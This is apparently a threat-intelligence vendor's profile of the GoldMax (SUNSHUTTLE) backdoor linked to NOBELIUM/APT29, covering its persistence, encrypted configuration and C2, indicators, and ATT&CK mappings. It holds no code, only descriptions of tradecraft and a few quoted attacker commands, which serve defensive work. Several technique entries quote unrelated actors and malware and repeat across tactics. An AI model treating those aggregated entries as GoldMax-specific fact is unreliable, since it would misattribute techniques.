GoldMax
GoldMax, also known as SUNSHUTTLE, is a second-stage command-and-control backdoor written in Go, with Windows and Linux variants. It is associated with NOBELIUM/APT29/Cozy Bear/The Dukes, the SVR-linked threat actor tied to the SolarWinds supply-chain intrusion. Microsoft reported GoldMax as part of NOBELIUM’s late-stage post-compromise tooling observed primarily from August to September 2020, possibly as early as June 2020, after initial access via compromised credentials or the trojanized SolarWinds Orion binary and follow-on activity involving TEARDROP.
GoldMax functions as a backdoor that can execute OS commands, spawn a shell, download and execute files, upload/exfiltrate files over the existing C2 channel, and receive configuration updates from C2. It persists via scheduled tasks, including tasks impersonating systems management software, and has used filenames matching the system name while residing in ProgramData subfolders made to resemble legitimate software locations. It can check the compromised system’s current date and time against a hardcoded execution trigger or activation date and can send the current timestamp to the C2 server.
For stealth and evasion, GoldMax has been packed for obfuscation, stores encrypted configuration data on disk in .tmp files, and can dynamically update configuration values such as activation date, C2 URL, User-Agent, decoy-traffic settings, and PRNG range. Microsoft reported the configuration is encrypted with AES-256 in CFB mode and Base64-encoded with a custom alphabet. GoldMax also uses decoy HTTP GET traffic around malicious communications to blend with legitimate web activity, including pseudo-random Referer values from common domains. Its communications with C2 are RSA-encrypted; Microsoft further described session establishment using HTTP requests with custom Cookie values, RSA-OAEP decryption of a session key using an embedded RSA private key, and an expected hardcoded shared-secret acknowledgement in an HTTP 200 response. GoldMax C2 infrastructure has used high-reputation or aged domains, including compromised domains and domains obtained through resellers.
Additional reported characteristics include a hardcoded MAC-address check for c8:27:cc:c2:37:5a that causes termination if present, and observed Go 1.14.2 compilation with build paths such as /var/www/html/builds/ and /var/www/html/go/src/. GoldMax is explicitly referenced in CISA malware analysis reporting for SUNSHUTTLE and in Microsoft reporting on GoldMax, GoldFinder, and Sibot as part of NOBELIUM’s layered persistence. High-confidence indicators directly mentioned in the content include the alias SUNSHUTTLE, the MAC address c8:27:cc:c2:37:5a, example encrypted config filename features.dat.tmp, and the plaintext log/behavioral artifacts around scheduled-task persistence and ProgramData masquerading.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Their toolkit includes 7-Zip, AdFind, ATI-Agent, AtNow, BEATDROP, BloodHound, CEELOADER, CloudDuke, Cobalt Strike, CosmicDuke, CozyDuke, Danfuan, EnvyScout, FatDuke, FoggyWeb, GeminiDuke, Geppei, GoldFinder, GoldMax...
We exposed similarities between DarkHalo’s SunShuttle backdoor and the Tomiris implant.
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniquesSVR cyber threat actors were responsible for the SolarWinds Orion supply chain compromise and the associated campaign that affected U.S. government agencies, critical infrastructure entities, and private sector organizations.
"It is distributed through a wide-scale malicious email campaign operated by NOBELIUM"
“On May 25, 2021, the campaign escalated as NOBELIUM leveraged the legitimate mass-mailing service, Constant Contact, to masquerade as a US-based development organization and distribute malicious URLs…”
Execution
4 techniquesGoldMax backdoor executable... Hides in hidden directories. Persistence via cron job on Linux.
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Many entries explicitly state malware 'can create a reverse shell' or 'launch a remote shell,' including 4H RAT, AuditCred, BLACKCOFFEE, Carbanak, DarkComet, Exaramel for Windows, PlugX, QuasarRAT, and ZxShell. | The content repeatedly describes use of cmd.exe, cmd /c, Windows command shell, and xp_cmdshell to execute commands, run payloads, launch binaries, perform reconnaissance, persistence, cleanup, and ransomware actions. Examples include: 'Sandworm Team used the xp_cmdshell command in MS-SQL', 'APT41 used cmd.exe /c to execute commands on remote machines', and many malware families 'can use cmd.exe to execute commands on a compromised host.'
MITRE ATT&CK® Techniques... System Services: Service Execution [T1569.002]
Persistence
3 techniquesGoldMax backdoor executable... Hides in hidden directories. Persistence via cron job on Linux.
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Privilege Escalation
3 techniquesGoldMax backdoor executable... Hides in hidden directories. Persistence via cron job on Linux.
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Stealth
7 techniquesThe content repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.
"Sandworm Team used UPX to pack a copy of Mimikatz"; "APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium"; "Lazarus Group packed malicious .db files with Themida to evade detection."
Examples throughout the content include 'encrypted payloads decrypted and executed in memory,' 'encrypts its configuration file,' 'AES-encrypted resource,' 'RC4 encrypted embedded scripts,' and 'payload includes an encrypted main component.'
During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.
RedCurl mimicked legitimate file names and scheduled tasks, e.g. MicrosoftCurrentupdatesCheck and MdMMaintenenceTask to mask malicious files and scheduled tasks.
The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
Credential Access
1 techniqueLateral movement via the “credential hopping” technique, which includes browser cookie theft to bypass multifactor authentication (MFA) on privileged cloud accounts.
Discovery
2 techniquesThe content repeatedly describes actors and malware using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, netsh interface show, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, and network adapter/interface details.
Multiple malware and threat groups are described as collecting/deriving local system time, date, timestamp, tick count, or time zone (e.g., "used time /t and net time \ip/hostname for system time discovery"; "collects the timestamp from the victim’s machine"; "can collect the time zone information from the system").
Lateral Movement
1 techniqueSVR cyber actors have used a range of initial exploitation techniques... coupled with stealthy intrusion tradecraft within compromised networks... Lateral movement via the “credential hopping” technique...
Command and Control
7 techniquesExamples include 'AppleJeus's COLDCAT C2 leverages cookie headers to contain data over HTTPS,' 'ChChes ... embeds data within the Cookie HTTP header,' 'GoldMax ... used custom HTTP cookies for C2,' and 'UPPERCUT ... sending error codes in Cookie headers.'
MITRE ATT&CK Mappings: APT29 Command and Control T1071: Application Layer Protocol .001: Web Protocols .004: DNS
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
MITRE ATT&CK® Techniques... Ingress Tool Transfer [T1105]
4H RAT has the capability to create a remote shell. AuditCred can open a reverse shell on the system to execute commands. PlugX allows actors to spawn a reverse shell on a victim. QuasarRAT can launch a remote shell to execute commands on the victim’s machine.
The content repeatedly describes malware and threat actors using SSL, TLS, HTTPS, RSA, AES, Blowfish, RC4, ECIES, Diffie-Hellman, OpenSSL, WolfSSL, and mutual TLS to protect command and control traffic.
Multiple malware families and intrusion sets are described as encrypting C2 traffic using SSL/TLS/HTTPS (e.g., "used HTTPS for command and control", "encrypts C2 communications with TLS", "uses SSL for encrypting C2 communications", "TLS-encrypted WebSocket Protocol (WSS) for C2"). | Examples include: "encrypts some C2 with RSA", "RSA encryption for C2 communications", "hard-coded RSA public key", "RSA-2048", "RSA-4096", and "REvil has encrypted C2 communications with the ECIES algorithm".
Exfiltration
1 techniqueADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
Recent activity
30 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Their toolkit includes 7-Zip, AdFind, ATI-Agent, AtNow, BEATDROP, BloodHound, CEELOADER, CloudDuke, Cobalt Strike, CosmicDuke, CozyDuke, Danfuan, EnvyScout, FatDuke, FoggyWeb, GeminiDuke, Geppei, GoldFinder, GoldMax...
Backdoor referenced as similar to the Tomiris Golang backdoor; no further technical detail provided in this content.
Malware implant identified in the content as one of the families used in the SolarWinds-related activity by NOBELIUM.
Custom malware attributed to NOBELIUM used for layered persistence (per Microsoft).
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.